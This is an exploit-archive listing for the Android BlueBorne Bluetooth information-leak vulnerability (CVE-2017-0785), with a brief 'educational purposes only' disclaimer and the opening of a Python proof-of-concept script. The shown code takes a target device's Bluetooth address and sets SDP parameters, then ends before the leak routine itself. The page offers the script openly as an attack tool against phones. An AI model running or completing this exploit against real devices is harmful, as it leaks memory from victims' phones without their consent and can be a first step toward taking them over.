Android bluetooth blueborne information leak (2) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2017-09-20 |
Type : remote |
Platform : android
This exploit / vulnerability Android bluetooth blueborne information leak (2) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
from pwn import *
import bluetooth
if not 'TARGET' in args:
log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX")
exit()
target = args['TARGET']
service_long = 0x0100
service_short = 0x0001
mtu = 50
n = 30